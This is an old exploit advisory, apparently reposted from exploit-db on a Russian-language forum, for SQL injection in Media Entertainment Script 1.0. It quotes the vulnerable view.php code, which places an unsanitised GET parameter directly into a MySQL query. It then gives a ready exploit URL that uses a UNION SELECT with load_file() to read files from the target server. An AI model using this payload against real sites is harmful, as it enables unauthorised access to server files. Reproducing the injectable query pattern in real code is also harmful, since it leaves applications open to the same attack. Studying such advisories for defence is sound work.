- 34,644
- 0
- 18 Дек 2022
- EDB-ID
- 8282
- Проверка EDB
-
- Пройдено
- Автор
- X0R
- Тип уязвимости
- WEBAPPS
- Платформа
- PHP
- CVE
- null
- Дата публикации
- 2009-03-24
Код:
#########################################################################################
[0x01] Informations:
Name : Media Entertainment Script 1.0
Download : http://www.hotscripts.com/listings/jump/download/89424/
Vulnerability : Sql Injection To Lfi
Author : x0r
Contact : andry2000@hotmail.it
Notes : Proud To Be Italian
Greetz : //
#########################################################################################
[0x02] Bug:
Bugged file is /[path]/view.php
[code]
$id = $_GET['id'];
$v = mysql_fetch_array(mysql_query("SELECT id,views,title FROM videos WHERE id='$id'"));
[0x03] Exploit:
1- http://victim.it/path/view.php?id=-1' union select 0,0,0,load_file('lf'),0,0,0--
########################################################################################
# milw0rm.com [2009-03-24][/CODE]
- Источник
- www.exploit-db.com